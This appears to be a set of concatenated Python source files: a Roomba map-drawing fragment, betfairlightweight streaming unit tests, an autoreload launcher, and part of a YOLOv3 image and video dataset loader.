if box is not None:
area = (box[2]-box[0]) * (box[3]-box[1])
if area < max_area:
angle = try_angle
x_y = ((box[2] - box[0]) // 2 + box[0],
(box[3] - box[1]) // 2 + box[1])
max_area = area
if recursion >= 1:
return x_y, angle
x_y, angle = self.PIL_get_image_parameters(
image,
(angle + 1) * 10,
(angle - 1) * 10, -10,
recursion + 1)
# self.log.info("MAP: PIL: image center: "
# "x:%d, y:%d, angle %.2f" % (x_y[0], x_y[1], angle))
return x_y, angle
def get_image_parameters(self, image=None, contour=None, final=False):
'''
updates angle of image, and centre using cv2 or PIL.
NOTE: this assumes the floorplan is rectangular! if you live in a
lighthouse, the angle will not be valid!
input is cv2 contour or PIL image
routines find the minnimum area rectangle that fits the image outline
'''
if contour is not None and HAVE_CV2:
# find minnimum area rectangle that fits
# returns (x,y), (width, height), theta - where (x,y) is the center
x_y,l_w,angle = cv2.minAreaRect(contour)
elif image is not None and HAVE_PIL:
x_y, angle = self.PIL_get_image_parameters(image)
else:
return
if angle < self.angle - 45:
angle += 90
if angle > 45-self.angle:
angle -= 90
if final:
self.cx = x_y[0]
self.cy = x_y[1]
self.angle = angle
self.log.info("MAP: image center: x:%d, y:%d, angle %.2f" %
(x_y[0], x_y[1], angle))
def angle_between(self, p1, p2):
'''
clockwise angle between two points in degrees
'''
if HAVE_CV2:
ang1 = np.arctan2(*p1[::-1])
ang2 = np.arctan2(*p2[::-1])
return np.rad2deg((ang1 - ang2) % (2 * np.pi))
else:
side1=math.sqrt(((p1[0] - p2[0]) ** 2))
side2=math.sqrt(((p1[1] - p2[1]) ** 2))
return math.degrees(math.atan(side2/side1))
def findContours(self,image,mode,method):
'''
Version independent find contours routine. Works with OpenCV 2 or 3 or 4.
Returns modified image (with contours applied), contours list, hierarchy
'''
ver = int(cv2.__version__.split(".")[0])
im = image.copy()
if ver == 2 or ver == 4: #NW fix for OpenCV V4 21st Dec 2018
contours, hierarchy = cv2.findContours(im,mode,method)
return im, contours, hierarchy
else:
im_cont, contours, hierarchy = cv2.findContours(im,mode,method)
return im_cont, contours, hierarchy
def draw_final_map(self, overwrite=False):
'''
draw map with outlines at end of mission. Called when mission has
finished and Roomba has docked
'''
merge = Image.new('RGBA',self.base.size,self.transparent)
if HAVE_CV2:
# NOTE: this is CPU intensive!
edgedata = np.array(self.base.convert('L'), dtype=np.uint8)
# find all contours
_, contours, _ = self.findContours(
edgedata,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
# zero edge data for later use
edgedata.fill(0)
max_perimeter = 0
max_contour = None
for cnt in contours:
perimeter = cv2.arcLength(cnt,True)
if perimeter >= max_perimeter:
max_contour = cnt # get the contour with maximum length
max_perimeter = perimeter
if max_contour is None: return
if len(max_contour) < 5: return
try:
contours.remove(max_contour) # remove max contour from list
except ValueError:
self.log.warn("MAP: unable to remove contour")
pass
mask = np.full(edgedata.shape, 255, dtype=np.uint8) # white
# create mask (of other contours) in black
cv2.drawContours(mask,contours, -1, 0, -1)
# self.draw_edges is the max deviation from a line
# you can fiddle with this in enable_map
approx = cv2.approxPolyDP(max_contour,
self.draw_edges * max_perimeter,True)
bgimage = np.array(merge) # make blank RGBA image array
# draw contour and fill with "lawngreen"
cv2.drawContours(bgimage,[approx] , -1, (124, 252, 0, 255), -1)
# mask image with internal contours
bgimage = cv2.bitwise_and(bgimage,bgimage,mask = mask)
# not dure if you really need this - uncomment if you want the
# area outlined.
# draw longest contour aproximated to lines (in black), width 1
cv2.drawContours(edgedata,[approx] , -1, (255), 1)
outline = Image.fromarray(edgedata) # outline
base = Image.fromarray(bgimage) # filled background image
else:
base = self.base.filter(ImageFilter.SMOOTH_MORE)
# draw edges at end of mission
outline = base.convert('L').filter(ImageFilter.FIND_EDGES)
# outline = ImageChops.subtract(
# base.convert('L').filter(ImageFilter.EDGE_ENHANCE),
# base.convert('L'))
edges = ImageOps.invert(outline)
edges = self.make_transparent(edges, (0, 0, 0, 255))
if self.debug:
edges.save(self.mapPath+'/'+self.roombaName+'edges.png', "PNG")
merge = Image.alpha_composite(merge,base)
merge = Image.alpha_composite(merge,edges)
if overwrite:
self.log.info("MAP: Drawing final map")
self.last_completed_time = time.time()
self.base=merge
if self.debug:
merge_rotated = merge.rotate(180+self.angle, expand=True)
merge_rotated.save(
self.mapPath+'/'+self.roombaName+'final_map.png', "PNG")
|
test_betfairstream.py
|
import unittest
import socket
import time
import threading
from unittest import mock
from betfairlightweight.streaming.betfairstream import (
BetfairStream,
HistoricalStream,
HistoricalGeneratorStream,
)
from betfairlightweight.exceptions import SocketError, ListenerError
class BetfairStreamTest(unittest.TestCase):
def setUp(self):
self.mock_listener = mock.Mock()
self.mock_listener.on_data.return_value = False
self.unique_id = 1
self.app_key = "app_key"
self.session_token = "session_token"
self.timeout = 6
self.buffer_size = 1024
self.betfair_stream = BetfairStream(
self.unique_id,
self.mock_listener,
self.app_key,
self.session_token,
self.timeout,
self.buffer_size,
None,
)
def test_init(self):
assert self.betfair_stream._unique_id == self.unique_id
assert self.betfair_stream.listener == self.mock_listener
assert self.betfair_stream.app_key == self.app_key
assert self.betfair_stream.session_token == self.session_token
assert self.betfair_stream.timeout == self.timeout
assert self.betfair_stream.buffer_size == self.buffer_size
assert self.betfair_stream.host == "stream-api.betfair.com"
assert self.betfair_stream.receive_count == 0
assert self.betfair_stream.datetime_last_received is None
assert self.betfair_stream._socket is None
assert self.betfair_stream._running is False
def test_host_init(self):
betfair_stream = BetfairStream(
self.unique_id,
self.mock_listener,
self.app_key,
self.session_token,
self.timeout,
self.buffer_size,
"integration",
)
assert betfair_stream.host == "stream-api-integration.betfair.com"
@mock.patch("betfairlightweight.streaming.betfairstream.BetfairStream.authenticate")
@mock.patch("betfairlightweight.streaming.betfairstream.BetfairStream._connect")
@mock.patch("betfairlightweight.streaming.betfairstream.BetfairStream._read_loop")
def test_start(self, mock_read_loop, mock_connect, mock_authenticate):
self.betfair_stream._running = True
self.betfair_stream.start()
mock_read_loop.assert_called_with()
self.betfair_stream._running = False
self.betfair_stream.start()
mock_connect.assert_called_with()
mock_authenticate.assert_called_with()
@mock.patch(
"betfairlightweight.streaming.betfairstream.BetfairStream._create_socket"
)
def test_connect(self, mock_create_socket):
self.betfair_stream._connect()
assert self.betfair_stream._running is True
mock_create_socket.assert_called_with()
def test_stop(self):
self.betfair_stream.stop()
assert self.betfair_stream._running is False
assert self.betfair_stream._socket is None
@mock.patch("betfairlightweight.streaming.betfairstream.BetfairStream._send")
def test_authenticate(self, mock_send):
self.betfair_stream.authenticate()
mock_send.assert_called_with(
{
"id": self.betfair_stream._unique_id,
"appKey": self.app_key,
"session": self.session_token,
"op": "authentication",
}
)
self.betfair_stream.authenticate()
mock_send.assert_called_with(
{
"id": self.betfair_stream._unique_id,
"appKey": self.app_key,
"session": self.session_token,
"op": "authentication",
}
)
@mock.patch("betfairlightweight.streaming.betfairstream.BetfairStream._send")
def test_heartbeat(self, mock_send):
self.betfair_stream.heartbeat()
mock_send.assert_called_with(
{"id": self.betfair_stream._unique_id, "op": "heartbeat"}
)
self.betfair_stream.heartbeat()
mock_send.assert_called_with(
{"id": self.betfair_stream._unique_id, "op": "heartbeat"}
)
@mock.patch("betfairlightweight.streaming.betfairstream.BetfairStream._send")
def test_subscribe_to_markets(self, mock_send):
market_filter = {"test": 123}
market_data_filter = {"another_test": 123}
self.betfair_stream.subscribe_to_markets(
market_filter,
market_data_filter,
heartbeat_ms=1,
conflate_ms=2,
segmentation_enabled=False,
)
mock_send.assert_called_with(
{
"op": "marketSubscription",
"marketFilter": market_filter,
"id": self.betfair_stream._unique_id,
"marketDataFilter": market_data_filter,
"initialClk": None,
"clk": None,
"heartbeatMs": 1,
"conflateMs": 2,
"segmentationEnabled": False,
}
)
self.mock_listener.register_stream.assert_called_with(
self.betfair_stream._unique_id, "marketSubscription"
)
@mock.patch("betfairlightweight.streaming.betfairstream.BetfairStream._send")
def test_resubscribe_to_markets(self, mock_send):
market_filter = {"test": 123}
market_data_filter = {"another_test": 123}
initial_clk = "abcdef"
clk = "abc"
self.betfair_stream.subscribe_to_markets(
market_filter,
market_data_filter,
initial_clk,
clk,
heartbeat_ms=1,
conflate_ms=2,
segmentation_enabled=False,
)
mock_send.assert_called_with(
{
"op": "marketSubscription",
"marketFilter": market_filter,
"id": self.betfair_stream._unique_id,
"marketDataFilter": market_data_filter,
"initialClk": initial_clk,
"clk": clk,
"heartbeatMs": 1,
"conflateMs": 2,
"segmentationEnabled": False,
}
)
assert not self.mock_listener.register_stream.called
@mock.patch("betfairlightweight.streaming.betfairstream.BetfairStream._send")
def test_subscribe_to_orders(self, mock_send):
initial_clk = "abcdef"
clk = "abc"
self.betfair_stream.subscribe_to_orders(
initial_clk, clk, heartbeat_ms=1, conflate_ms=2, segmentation_enabled=False
)
mock_send.assert_called_with(
{
"orderFilter": "abcdef",
"id": self.betfair_stream._unique_id,
"op": "orderSubscription",
"initialClk": "abc",
"clk": None,
"heartbeatMs": 1,
"conflateMs": 2,
"segmentationEnabled": False,
}
)
self.mock_listener.register_stream.assert_called_with(
self.betfair_stream._unique_id, "orderSubscription"
)
@mock.patch("ssl.wrap_socket")
@mock.patch("socket.socket")
def test_create_socket(self, mock_socket, mock_wrap_socket):
self.betfair_stream._create_socket()
mock_socket.assert_called_with(socket.AF_INET, socket.SOCK_STREAM)
assert mock_wrap_socket.call_count == 1
@mock.patch(
"betfairlightweight.streaming.betfairstream.BetfairStream._data",
return_value=False,
)
@mock.patch(
"betfairlightweight.streaming.betfairstream.BetfairStream._receive_all",
return_value="{}\r\n",
)
def test_read_loop(self, mock_receive_all, mock_data):
mock_socket = mock.Mock()
self.betfair_stream._socket = mock_socket
self.betfair_stream._running = True
threading.Thread(target=self.betfair_stream._read_loop).start()
for i in range(0, 2):
time.sleep(0.1)
self.betfair_stream._running = False
time.sleep(0.1)
mock_data.assert_called_with("{}")
mock_receive_all.assert_called_with()
assert self.betfair_stream.datetime_last_received is not None
assert self.betfair_stream.receive_count > 0
def test_receive_all(self):
mock_socket = mock.Mock()
data_return_value = b'{"op":"status"}\r\n'
mock_socket.recv.return_value = data_return_value
self.betfair_stream._socket = mock_socket
data = self.betfair_stream._receive_all()
assert data == ""
self.betfair_stream._running = True
data = self.betfair_stream._receive_all()
mock_socket.recv.assert_called_with(self.buffer_size)
assert data == data_return_value.decode("utf-8")
@mock.patch("betfairlightweight.streaming.betfairstream.BetfairStream.stop")
def test_receive_all_closed(self, mock_stop):
mock_socket = mock.Mock()
data_return_value = b""
mock_socket.recv.return_value = data_return_value
self.betfair_stream._socket = mock_socket
self.betfair_stream._running = True
with self.assertRaises(SocketError):
self.betfair_stream._receive_all()
mock_stop.assert_called_with()
@mock.patch("betfairlightweight.streaming.betfairstream.BetfairStream.stop")
def test_receive_all_error(self, mock_stop):
mock_socket = mock.Mock()
self.betfair_stream._socket = mock_socket
self.betfair_stream._running = True
mock_socket.recv.side_effect = socket.error()
with self.assertRaises(SocketError):
self.betfair_stream._receive_all()
mock_stop.assert_called_with()
@mock.patch("betfairlightweight.streaming.betfairstream.BetfairStream.stop")
def test_receive_all_timeout(self, mock_stop):
mock_socket = mock.Mock()
self.betfair_stream._socket = mock_socket
self.betfair_stream._running = True
mock_socket.recv.side_effect = socket.timeout()
with self.assertRaises(SocketError):
self.betfair_stream._receive_all()
mock_stop.assert_called_with()
@mock.patch("betfairlightweight.streaming.betfairstream.BetfairStream.stop")
def test_data(self, mock_stop):
received_data = {"op": "status"}
with self.assertRaises(ListenerError):
self.betfair_stream._data(received_data)
self.mock_listener.on_data.assert_called_with(received_data)
assert mock_stop.called
self.mock_listener.on_data.return_value = True
self.betfair_stream._data(received_data)
self.mock_listener.on_data.assert_called_with(received_data)
assert mock_stop.call_count == 1
@mock.patch("betfairlightweight.streaming.betfairstream.BetfairStream.authenticate")
@mock.patch("betfairlightweight.streaming.betfairstream.BetfairStream._connect")
def test_send(self, mock_connect, mock_authenticate):
mock_socket = mock.Mock()
self.betfair_stream._socket = mock_socket
message = {"message": 1}
self.betfair_stream._send(message)
assert mock_connect.call_count == 1
assert mock_authenticate.call_count == 1
assert mock_socket.sendall.call_count == 1
@mock.patch("betfairlightweight.streaming.betfairstream.BetfairStream.stop")
def test_send_timeout(self, mock_stop):
self.betfair_stream._running = True
mock_socket = mock.Mock()
self.betfair_stream._socket = mock_socket
mock_socket.sendall.side_effect = socket.timeout()
message = {"message": 1}
with self.assertRaises(SocketError):
self.betfair_stream._send(message)
mock_stop.assert_called_with()
@mock.patch("betfairlightweight.streaming.betfairstream.BetfairStream.stop")
def test_send_error(self, mock_stop):
self.betfair_stream._running = True
mock_socket = mock.Mock()
self.betfair_stream._socket = mock_socket
mock_socket.sendall.side_effect = socket.error()
message = {"message": 1}
with self.assertRaises(SocketError):
self.betfair_stream._send(message)
mock_stop.assert_called_with()
def test_repr(self):
assert repr(self.betfair_stream) == "<BetfairStream>"
def test_str(self):
assert str(self.betfair_stream) == "<BetfairStream [not running]>"
self.betfair_stream._running = True
assert str(self.betfair_stream) == "<BetfairStream [running]>"
class HistoricalStreamTest(unittest.TestCase):
def setUp(self):
self.directory = "tests/resources/historicaldata/BASIC-1.132153978"
self.listener = mock.Mock()
self.stream = HistoricalStream(self.directory, self.listener)
def test_init(self):
assert self.stream.directory == self.directory
assert self.stream.listener == self.listener
assert self.stream._running is False
@mock.patch("betfairlightweight.endpoints.streaming.HistoricalStream._read_loop")
def test_start(self, mock_read_loop):
self.stream.start()
mock_read_loop.assert_called_with()
assert self.stream._running is True
def test_stop(self):
self.stream._running = True
self.stream.stop()
assert self.stream._running is False
@mock.patch("betfairlightweight.streaming.betfairstream.HistoricalStream.stop")
def test__read_loop(self, mock_stop):
self.stream._running = True
self.stream._read_loop()
self.assertEqual(self.listener.on_data.call_count, 480)
self.listener.on_data.snap()
mock_stop.assert_called_with()
self.assertTrue(self.stream._running)
class HistoricalGeneratorStreamTest(unittest.TestCase):
def setUp(self):
self.directory = "tests/resources/historicaldata/BASIC-1.132153978"
self.listener = mock.Mock()
self.stream = HistoricalGeneratorStream(self.directory, self.listener)
def test_init(self):
assert self.stream.directory == self.directory
assert self.stream.listener == self.listener
assert self.stream._running is False
@mock.patch(
"betfairlightweight.streaming.betfairstream.HistoricalGeneratorStream._read_loop"
)
def test_get_generator(self, mock_read_loop):
self.assertEqual(self.stream.get_generator(), mock_read_loop)
@mock.patch(
"betfairlightweight.streaming.betfairstream.HistoricalGeneratorStream.stop"
)
def test__read_loop(self, mock_stop):
data = [i for i in self.stream._read_loop()]
self.assertEqual(len(data), 480)
self.assertEqual(self.listener.on_data.call_count, 480)
self.listener.on_data.snap()
mock_stop.assert_called_with()
self.assertTrue(self.stream._running)
|
autoreload.py
|
# Autoreloading launcher.
# Borrowed from Peter Hunt and the CherryPy project (http://www.cherrypy.org).
# Some taken from Ian Bicking's Paste (http://pythonpaste.org/).
#
# Borrowed from Django and adapted for Cyrax.
#
# Portions copyright (c) 2004, CherryPy Team (team@cherrypy.org)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the CherryPy Team nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os, sys, time
import logging
from threading import Thread
logger = logging.getLogger(__name__)
RUN_RELOADER = True
_mtimes = {}
_win = (sys.platform == "win32")
def normpath(p):
return os.path.normpath(os.path.abspath(p))
def _should_ignore(path, exclude):
root, subpart = os.path.split(path)
if root == path:
# reached the /
return False
for exc in exclude:
if normpath(path) == normpath(exc):
return True
return _should_ignore(root, exclude)
def _get_mtime(path):
try:
stat = os.stat(path)
except OSError:
return None
mtime = stat.st_mtime
if _win:
mtime -= stat.st_ctime
return mtime
def source_changed(path, exclude=None):
global _mtimes
if exclude is None:
exclude = []
for root, dirs, files in os.walk(path):
if _should_ignore(root, exclude):
continue
for filename in files:
filepath = os.path.join(root, filename)
mtime = _get_mtime(filepath)
if filepath not in _mtimes:
_mtimes[filepath] = mtime
continue
if mtime != _mtimes[filepath]:
logger.debug('File %r is changed', filepath)
_mtimes = {}
return True
return False
def reloader_thread(source, dest):
while RUN_RELOADER:
if source_changed(source, exclude=[dest]):
logger.info('Source changed, restarting')
sys.exit(3) # force reload
time.sleep(1)
def restart_with_reloader():
while True:
args = [sys.executable] + sys.argv
if sys.platform == "win32":
args = ['"%s"' % arg for arg in args]
new_environ = os.environ.copy()
new_environ["RUN_MAIN"] = 'true'
exit_code = os.spawnve(os.P_WAIT, sys.executable, args, new_environ)
if exit_code != 3:
return exit_code
def reloader(main_func, args, kwargs):
if os.environ.get("RUN_MAIN") == "true":
Thread(target=main_func, args=args, kwargs=kwargs).start()
try:
reloader_thread(kwargs['source'], kwargs['dest'])
except KeyboardInterrupt:
pass
else:
try:
sys.exit(restart_with_reloader())
except KeyboardInterrupt:
pass
def main(main_func, args=None, kwargs=None):
if args is None:
args = ()
if kwargs is None:
kwargs = {}
reloader(main_func, args, kwargs)
|
datasets.py
|
import os
import time
import glob
import math
import random
import shutil
import numpy as np
from tqdm import tqdm
from pathlib import Path
from threading import Thread
import cv2
from PIL import Image, ExifTags
import torch
from torch.utils.data import Dataset
from .helpers.utils import (
xyxy2xywh,
xywh2xyxy,
)
help_url = "https://github.com/ultralytics/yolov3/wiki/Train-Custom-Data"
img_formats = [".bmp", ".jpg", ".jpeg", ".png", ".tif", ".dng"]
vid_formats = [".mov", ".avi", ".mp4"]
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == "Orientation":
break
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except Exception:
pass
return s
class LoadImages: # for inference
def __init__(self, path, img_size=416):
path = str(Path(path)) # os-agnostic
files = []
if os.path.isdir(path):
files = sorted(glob.glob(os.path.join(path, "*.*")))
elif os.path.isfile(path):
files = [path]
images = [x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
videos = [x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
nI, nV = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nF = nI + nV # number of files
self.video_flag = [False] * nI + [True] * nV
self.mode = "images"
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nF > 0, "No images or videos found in " + path
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nF:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = "video"
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nF: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print(
"video %g/%g (%g/%g) %s: "
% (self.count + 1, self.nF, self.frame, self.nframes, path),
end="",
)
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, "Image Not Found " + path
print("image %g/%g %s: " % (self.count, self.nF, path), end="")
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
# cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1]) # save letterbox image
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nF # number of files
class LoadWebcam: # for inference
def __init__(self, pipe=0, img_size=416):
self.img_size = img_size
if pipe == "0":
pipe = 0 # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa' # IP traffic camera
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
# https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
# pipe = '"rtspsrc location="rtsp://username:password@192.168.1.64/1" latency=10 ! appsink' # GStreamer
# https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
# https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package # install help
# pipe = "rtspsrc location=rtsp://root:root@192.168.0.91:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink" # GStreamer
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord("q"): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, "Camera Error %s" % self.pipe
img_path = "webcam.jpg"
print("webcam %g: " % self.count, end="")
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources="streams.txt", img_size=416):
self.mode = "images"
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, "r") as f:
sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print("%g/%g: %s... " % (i + 1, n, s), end="")
cap = cv2.VideoCapture(0 if s == "0" else s)
assert cap.isOpened(), "Failed to open %s" % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(" success (%gx%g at %.2f FPS)." % (w, h, fps))
thread.start()
print("") # newline
# check for common shapes
s = np.stack(
[letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0
) # inference shapes
self.rect = (
np.unique(s, axis=0).shape[0] == 1
) # rect inference if all shapes equal
if not self.rect:
print(
"WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams."
)
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord("q"): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [
letterbox(
x, new_shape=self.img_size, auto=self.rect, interp=cv2.INTER_LINEAR
)[0]
for x in img0
]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(
self,
path,
img_size=416,
batch_size=16,
augment=False,
hyp=None,
rect=False,
image_weights=False,
cache_labels=True,
cache_images=False,
single_cls=False,
):
path = str(Path(path)) # os-agnostic
assert os.path.isfile(path), "File not found %s. See %s" % (path, help_url)
with open(path, "r") as f:
self.img_files = [
x.replace("/", os.sep)
for x in f.read().splitlines() # os-agnostic
if os.path.splitext(x)[-1].lower() in img_formats
]
n = len(self.img_files)
assert n > 0, "No images found in %s. See %s" % (path, help_url)
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.n = n
self.batch = bi # batch index of image
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = (
self.augment and not self.rect
) # load 4 images at a time into a mosaic (only during training)
# Define labels
self.label_files = [
x.replace("images", "labels").replace(os.path.splitext(x)[-1], ".txt")
for x in self.img_files
]
# Rectangular Training https://github.com/ultralytics/yolov3/issues/232
if self.rect:
# Read image shapes (wh)
sp = path.replace(".txt", ".shapes") # shapefile path
try:
with open(sp, "r") as f: # read existing shapefile
s = [x.split() for x in f.read().splitlines()]
assert len(s) == n, "Shapefile out of sync"
except Exception:
s = [
exif_size(Image.open(f))
for f in tqdm(self.img_files, desc="Reading image shapes")
]
np.savetxt(sp, s, fmt="%g") # overwrites existing (if any)
# Sort by aspect ratio
s = np.array(s, dtype=np.float64)
ar = s[:, 1] / s[:, 0] # aspect ratio
i = ar.argsort()
self.img_files = [self.img_files[i] for i in i]
self.label_files = [self.label_files[i] for i in i]
self.shapes = s[i] # wh
ar = ar[i]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = (
np.ceil(np.array(shapes) * img_size / 32.0).astype(np.int) * 32
)
# Preload labels (required for weighted CE training)
self.imgs = [None] * n
self.labels = [None] * n
if cache_labels or image_weights: # cache labels for faster training
self.labels = [np.zeros((0, 5))] * n
extract_bounding_boxes = False
create_datasubset = False
pbar = tqdm(self.label_files, desc="Caching labels")
nm, nf, ne, ns, nd = (
0,
0,
0,
0,
0,
) # number missing, found, empty, datasubset, duplicate
for i, file in enumerate(pbar):
try:
with open(file, "r") as f:
l = np.array(
[x.split() for x in f.read().splitlines()], dtype=np.float32
)
except Exception:
nm += 1 # print('missing labels for image %s' % self.img_files[i]) # file missing
continue
if l.shape[0]:
assert l.shape[1] == 5, "> 5 label columns: %s" % file
assert (l >= 0).all(), "negative labels: %s" % file
assert (l[:, 1:] <= 1).all(), (
"non-normalized or out of bounds coordinate labels: %s" % file
)
if np.unique(l, axis=0).shape[0] < l.shape[0]: # duplicate rows
nd += 1 # print('WARNING: duplicate rows in %s' % self.label_files[i]) # duplicate rows
if single_cls:
l[:, 0] = 0 # force dataset into single-class mode
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1e4:
if ns == 0:
create_folder(path="./datasubset")
os.makedirs("./datasubset/images")
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open("./datasubset/images.txt", "a") as f:
f.write(self.img_files[i] + "\n")
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w = img.shape[:2]
for j, x in enumerate(l):
f = "%s%sclassifier%s%g_%g_%s" % (
p.parent.parent,
os.sep,
os.sep,
x[0],
j,
p.name,
)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * [w, h, w, h] # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(
b[[0, 2]], 0, w
) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(
f, img[b[1] : b[3], b[0] : b[2]]
), "Failure extracting classifier boxes"
else:
ne += 1 # print('empty labels for image %s' % self.img_files[i]) # file empty
# os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i])) # remove
pbar.desc = (
"Caching labels (%g found, %g missing, %g empty, %g duplicate, for %g images)"
% (nf, nm, ne, nd, n)
)
assert nf > 0, "No labels found. See %s" % help_url
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
if cache_images: # if training
gb = 0 # Gigabytes of cached images
pbar = tqdm(range(len(self.img_files)), desc="Caching images")
